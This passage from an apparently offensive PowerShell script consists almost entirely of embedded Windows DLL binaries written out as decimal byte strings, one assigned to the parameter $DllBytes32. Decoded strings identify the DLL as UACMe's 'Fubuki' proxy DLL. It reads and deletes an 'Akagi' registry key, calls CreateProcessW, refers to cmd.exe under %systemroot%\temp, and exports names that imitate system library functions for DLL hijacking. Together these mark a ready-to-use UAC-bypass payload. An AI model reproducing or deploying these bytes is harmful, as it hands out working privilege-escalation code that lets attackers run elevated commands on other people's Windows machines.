110 101 85 114 105 0 80 114 111 99 101 115 115 65 99 116 105 111 110 81 117 101 117 101 0 83 76 71 101 116 87 105 110 100 111 119 115 73 110 102 111 114 109 97 116 105 111 110 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 69 110 117 109 0 87 100 115 67 114 101 97 116 101 66 108 97 99 107 98 111 97 114 100 0 87 100 115 68 101 115 116 114 111 121 66 108 97 99 107 98 111 97 114 100 0 87 100 115 69 110 117 109 70 105 114 115 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 69 110 117 109 78 101 120 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 70 114 101 101 68 97 116 97 0 87 100 115 71 101 116 66 108 97 99 107 98 111 97 114 100 86 97 108 117 101 0 87 100 115 73 110 105 116 105 97 108 105 122 101 0 87 100 115 73 115 68 105 97 103 110 111 115 116 105 99 77 111 100 101 69 110 97 98 108 101 100 0 87 100 115 83 101 
116 65 115 115 101 114 116 70 108 97 103 115 0 87 100 115 83 101 116 117 112 76 111 103 77 101 115 115 97 103 101 87 0 87 100 115 84 101 114 109 105 110 97 116 101 0 168 38 0 0 0 0 0 0 0 0 0 0 148 39 0 0 40 32 0 0 128 38 0 0 0 0 0 0 0 0 0 0 228 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 198 39 0 0 0 0 0 0 182 39 0 0 0 0 0 0 162 39 0 0 0 0 0 0 214 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 86 39 0 0 0 0 0 0 98 39 0 0 0 0 0 0 72 39 0 0 0 0 0 0 130 39 0 0 0 0 0 0 50 39 0 0 0 0 0 0 22 39 0 0 0 0 0 0 10 39 0 0 0 0 0 0 112 39 0 0 0 0 0 0 248 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 197 2 71 101 116 83 116 97 114 116 117 112 73 110 102 111 87 0 60 3 72 101 97 112 70 114 101 101 0 0 91 1 69 120 112 97 110 100 69 110 118 105 114 111 110 109 101 110 116 83 116 114 105 110 103 115 87 0 253 3 79 117 116 112 117 116 68 101 98 117 103 83 116 114 105 110 103 87 0 0 127 0 67 108 111 115 101 72 97 110 100 108 101 0 56 3 72 101 97 112 65 108 108 111 99 0 87 1 69 120 105 116 80 114 111 99 101 115 115 0 169 2 71 101 116 80 114 111 99 101 115 115 72 101 97 112 0 0 219 0 67 114 101 97 116 101 80 114 111 99 101 115 115 87 0 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 146 2 82 101 103 81 117 101 114 121 86 97 108 117 101 69 120 87 0 0 133 2 82 101 103 79 112 101 110 75 101 121 69 120 87 0 104 2 82 101 103 68 101 108 101 116 101 75 101 121 87 0 84 2 82 101 103 67 108 111 115 101 75 101 121 0 65 68 86 65 80 73 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 16 0 0 167 17 0 0 132 34 0 0 168 17 0 0 52 19 0 0 152 34 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 16 0 0 0 32 0 0 128 24 0 0 0 56 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 80 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 104 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 144 0 0 0 160 64 0 0 192 2 0 0 0 0 0 0 0 0 0 0 96 67 0 0 125 1 0 0 0 0 0 0 0 0 0 0 192 2 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0 83 0 73 0 79 0 78 0 95 0 73 0 78 0 70 0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 9 0 1 0 0 0 0 0 9 0 1 0 0 0 0 0 63 0 0 0 0 0 0 0 0 0 4 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 2 0 0 1 0 83 0 116 0 114 0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 252 1 0 0 1 0 48 0 52 0 48 0 57 0 48 0 52 0 98 0 48 0 0 0 50 0 9 0 1 0 67 0 111 0 109 0 112 0 97 0 110 0 121 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 0 0 72 0 16 0 1 0 70 0 105 0 108 0 101 0 68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105 0 111 0 110 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 32 0 112 0 114 0 111 0 120 0 121 0 32 0 68 0 76 0 76 0 0 0 48 0 8 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 46 0 7 0 1 0 73 0 110 0 116 0 101 0 114 0 110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 0 0 0 0 104 0 34 0 1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 0 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 32 0 40 0 67 0 41 0 32 0 50 0 48 0 49 0 52 0 32 0 45 0 50 0 
48 0 49 0 53 0 32 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 62 0 11 0 1 0 79 0 114 0 105 0 103 0 105 0 110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 46 0 100 0 108 0 108 0 0 0 0 0 44 0 6 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 0 0 52 0 8 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 68 0 0 0 1 0 86 0 97 0 114 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36 0 4 0 0 0 84 0 114 0 97 0 110 0 115 0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 9 4 176 4 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 
101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0",
6774
6775 [Parameter(Position = 6, Mandatory = $False)]
6776 [String]
6777 $DllBytes32 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 4 0 4 49 10 86 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 4 0 0 0 16 0 0 0 0 0 0 46 17 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 162 232 0 0 2 0 64 5 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 80 33 0 0 148 3 0 0 192 37 0 0 60 0 0 0 0 48 0 0 224 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 60 0 0 0 16 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 137 2 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 50 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 48 0 0 0 6 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 60 0 0 0 0 64 0 0 0 2 0 0 0 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 195 85 139 236 131 236 92 83 87 141 69 252 51 219 80 104 25 0 2 0 83 104 64 32 0 16 104 1 0 0 128 139 251 137 93 252 137 93 248 255 21 4 32 0 16 133 192 15 133 241 0 0 0 57 93 252 15 132 232 0 0 0 86 139 53 8 32 0 16 141 69 248 80 83 83 83 104 96 32 0 16 255 117 252 255 214 133 192 15 133 199 0 0 0 139 69 248 64 80 106 8 255 21 48 32 0 16 80 255 21 20 32 0 16 139 216 133 219 15 132 169 0 0 0 141 69 248 80 83 87 87 104 96 32 0 16 255 117 252 255 214 133 192 117 107 139 53 36 32 0 16 104 120 32 0 16 255 214 83 255 214 106 68 90 139 202 141 69 164 198 0 0 64 131 233 1 117 247 106 16 89 141 69 232 198 0 0 64 131 233 1 117 247 141 69 164 137 85 164 80 255 21 52 32 0 16 141 69 232 80 141 69 164 80 51 192 80 80 80 80 80 80 83 80 255 21 32 32 0 16 139 248 133 255 116 16 255 117 232 139 53 28 32 0 16 255 214 255 117 236 255 214 83 106 0 255 21 48 32 0 16 80 255 21 44 32 0 16 255 117 252 255 21 12 32 0 16 104 64 32 0 16 104 1 0 0 128 255 21 0 32 0 16 94 139 199 95 91 139 229 93 195 85 139 236 129 236 112 6 0 0 51 192 64 83 86 57 69 12 15 133 60 1 0 0 104 160 32 0 16 255 21 36 32 0 16 232 172 254 255 255 51 219 133 192 15 133 27 1 0 0 106 68 90 139 202 141 69 172 136 24 64 131 233 1 117 248 106 16 89 141 69 240 136 24 64 131 233 1 117 248 141 69 172 137 85 172 80 255 21 52 32 0 16 185 10 2 0 0 141 133 160 253 255 255 136 24 64 131 233 1 117 248 190 4 1 0 0 141 133 160 253 255 255 86 80 104 212 32 0 16 255 21 40 32 0 16 133 192 15 132 189 0 0 0 59 198 15 131 181 0 0 0 185 16 4 0 0 141 133 144 249 255 255 136 24 64 131 233 1 117 248 102 139 133 160 253 255 255 141 141 144 249 255 
255 102 133 192 116 30 15 183 240 141 149 160 253 255 255 139 193 43 208 102 137 49 131 193 2 15 183 4 10 139 240 102 133 192 117 239 51 192 102 137 1 141 141 144 249 255 255 102 57 133 144 249 255 255 116 8 131 193 2 102 57 25 117 248 106 99 186 252 32 0 16 94 43 209 102 137 49 141 73 2 15 183 4 10 139 240 102 133 192 117 239 51 192 102 137 1 141 69 240 80 141 69 172 80 141 133 160 253 255 255 80 83 83 83 83 83 83 141 133 144 249 255 255 80 255 21 32 32 0 16 133 192 116 16 255 117 240 139 53 28 32 0 16 255 214 255 117 244 255 214 83 255 21 24 32 0 16 94 91 139 229 93 194 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6 39 0 0 246 38 0 0 226 38 0 0 22 39 0 0 0 0 0 0 150 38 0 0 162 38 0 0 136 38 0 0 194 38 0 0 114 38 0 0 86 38 0 0 74 38 0 0 176 38 0 0 56 38 0 0 0 0 0 0 0 0 0 0 83 0 111 0 102 0 116 0 119 0 97 0 114 0 101 0 92 0 65 0 107 0 97 0 103 0 105 0 0 0 0 0 76 0 111 0 118 0 101 0 76 0 101 0 116 0 116 0 101 0 114 0 0 0 0 0 65 0 107 0 97 0 103 0 105 0 32 0 108 0 101 0 116 0 116 0 101 0 114 0 32 0 102 0 111 0 117 0 110 0 100 0 0 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 32 0 97 0 116 0 32 0 121 0 111 0 117 0 114 0 32 0 115 0 101 0 114 0 118 0 105 0 99 0 101 0 46 0 13 0 10 0 0 0 37 0 115 0 121 0 115 0 116 0 101 0 109 0 114 0 111 0 111 0 116 0 37 0 92 0 116 0 101 0 109 0 
112 0 92 0 0 0 0 0 99 0 109 0 100 0 46 0 98 0 97 0 116 0 0 0 0 0 0 0 0 0 0 0 4 49 10 86 0 0 0 0 13 0 0 0 220 0 0 0 228 36 0 0 228 12 0 0 0 0 0 0 4 49 10 86 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 49 10 86 0 0 0 0 144 34 0 0 1 0 0 0 28 0 0 0 28 0 0 0 120 33 0 0 232 33 0 0 88 34 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 0 16 0 0 157 34 0 0 180 34 0 0 202 34 0 0 212 34 0 0 222 34 0 0 249 34 0 0 21 35 0 0 48 35 0 0 67 35 0 0 88 35 0 0 106 35 0 0 126 35 0 0 147 35 0 0 175 35 0 0 194 35 0 0 218 35 0 0 237 35 0 0 8 36 0 0 28 36 0 0 49 36 0 0 76 36 0 0 102 36 0 0 114 36 0 0 136 36 0 0 150 36 0 0 177 36 0 0 195 36 0 0 215 36 0 0 0 0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 8 0 9 0 10 0 11 0 12 0 13 0 14 0 15 0 16 0 17 0 18 0 19 0 20 0 21 0 22 0 23 0 24 0 25 0 26 0 27 0 70 117 98 117 107 105 51 50 46 100 108 108 0 67 97 108 108 78 116 80 111 119 101 114 73 110 102 111 114 109 97 116 105 111 110 0 67 111 110 115 116 114 117 99 116 80 97 114 116 105 97 108 77 115 103 86 87 0 67 114 101 97 116 101 85 114 105 0 67 117 114 114 101 110 116 73 80 0 68 101 118 79 98 106 67 114 101 97 116 101 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 68 101 115 116 114 111 121 68 101 118 105 99 101 73 110 102 111 76 105 115 116 0 68 101 118 79 98 106 69 110 117 109 68 101 118 105 99 101 73 110 116 101 114 102 97 99 101 115 0 68 101 118 79 98 106 71 101 116 67 108 97 115 115 68 101 118 115 0 68 101 118 79 98 106 79 112 101 110 68 101 118 105 99 101 73 110 102 111 0 68 108 108 82 101 103 105 115 116 101 114 83 101 114 118 101 114 0 71 101 110 101 114 97 116 101 65 99 116 105 111 110 81 117 101 117 101 0 80 111 119 101 114 71 101 116 65 99 116 105 118 101 83 99 104 101 109 101 0 80 114 105 118 97 116 101 67 111 73 110 116 101 114 110 101 116 67 111 109 98 
105 110 101 85 114 105 0 80 114 111 99 101 115 115 65 99 116 105 111 110 81 117 101 117 101 0 83 76 71 101 116 87 105 110 100 111 119 115 73 110 102 111 114 109 97 116 105 111 110 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 0 87 100 115 65 98 111 114 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 69 110 117 109 0 87 100 115 67 114 101 97 116 101 66 108 97 99 107 98 111 97 114 100 0 87 100 115 68 101 115 116 114 111 121 66 108 97 99 107 98 111 97 114 100 0 87 100 115 69 110 117 109 70 105 114 115 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 69 110 117 109 78 101 120 116 66 108 97 99 107 98 111 97 114 100 73 116 101 109 0 87 100 115 70 114 101 101 68 97 116 97 0 87 100 115 71 101 116 66 108 97 99 107 98 111 97 114 100 86 97 108 117 101 0 87 100 115 73 110 105 116 105 97 108 105 122 101 0 87 100 115 73 115 68 105 97 103 110 111 115 116 105 99 77 111 100 101 69 110 97 98 108 101 100 0 87 100 115 83 101 116 65 115 115 101 114 116 70 108 97 103 115 0 87 100 115 83 101 116 117 112 76 111 103 77 101 115 115 97 103 101 87 0 87 100 115 84 101 114 109 105 110 97 116 101 0 71 67 84 76 0 16 0 0 137 2 0 0 46 116 101 120 116 36 109 110 0 0 0 0 0 32 0 0 60 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 64 32 0 0 8 1 0 0 46 114 100 97 116 97 0 0 80 33 0 0 148 3 0 0 46 101 100 97 116 97 0 0 228 36 0 0 220 0 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 192 37 0 0 40 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 232 37 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 252 37 0 0 60 0 0 0 46 105 100 97 116 97 36 52 0 0 0 0 56 38 0 0 250 0 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 160 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 160 48 0 0 64 4 0 0 46 114 115 114 99 36 48 50 0 0 0 0 16 38 0 0 0 0 0 0 0 0 0 0 212 38 0 0 20 32 0 0 252 37 0 0 0 0 0 0 0 0 0 0 36 39 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6 39 0 0 246 38 0 0 226 38 0 0 22 39 0 0 0 0 0 0 150 38 0 0 162 38 0 0 136 38 0 0 194 38 0 0 114 38 0 0 86 38 0 0 74 38 0 0 
176 38 0 0 56 38 0 0 0 0 0 0 190 2 71 101 116 83 116 97 114 116 117 112 73 110 102 111 87 0 51 3 72 101 97 112 70 114 101 101 0 0 85 1 69 120 112 97 110 100 69 110 118 105 114 111 110 109 101 110 116 83 116 114 105 110 103 115 87 0 250 3 79 117 116 112 117 116 68 101 98 117 103 83 116 114 105 110 103 87 0 0 127 0 67 108 111 115 101 72 97 110 100 108 101 0 47 3 72 101 97 112 65 108 108 111 99 0 81 1 69 120 105 116 80 114 111 99 101 115 115 0 162 2 71 101 116 80 114 111 99 101 115 115 72 101 97 112 0 0 219 0 67 114 101 97 116 101 80 114 111 99 101 115 115 87 0 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 146 2 82 101 103 81 117 101 114 121 86 97 108 117 101 69 120 87 0 0 133 2 82 101 103 79 112 101 110 75 101 121 69 120 87 0 104 2 82 101 103 68 101 108 101 116 101 75 101 121 87 0 84 2 82 101 103 67 108 111 115 101 75 101 121 0 65 68 86 65 80 73 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 16 0 0 0 32 0 0 128 24 0 0 0 56 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 80 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 104 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 144 0 0 0 160 48 0 0 192 2 0 0 0 0 0 0 0 0 0 0 96 51 0 0 125 1 0 0 0 0 0 0 0 0 0 0 192 2 52 0 0 0 86 0 83 0 95 0 86 0 69 0 82 0 83 0 73 0 79 0 78 0 95 0 73 0 78 0 70 0 79 0 0 0 0 0 189 4 239 254 0 0 1 0 9 0 1 0 0 0 0 0 9 0 1 0 0 0 0 0 63 0 0 0 0 0 0 0 0 0 4 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 2 0 0 1 0 83 0 116 0 114 0 105 0 110 0 103 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 252 1 0 0 1 0 48 0 52 0 48 0 57 0 48 0 52 0 98 0 48 
0 0 0 50 0 9 0 1 0 67 0 111 0 109 0 112 0 97 0 110 0 121 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 0 0 72 0 16 0 1 0 70 0 105 0 108 0 101 0 68 0 101 0 115 0 99 0 114 0 105 0 112 0 116 0 105 0 111 0 110 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 32 0 112 0 114 0 111 0 120 0 121 0 32 0 68 0 76 0 76 0 0 0 48 0 8 0 1 0 70 0 105 0 108 0 101 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 46 0 7 0 1 0 73 0 110 0 116 0 101 0 114 0 110 0 97 0 108 0 78 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 0 0 0 0 104 0 34 0 1 0 76 0 101 0 103 0 97 0 108 0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 0 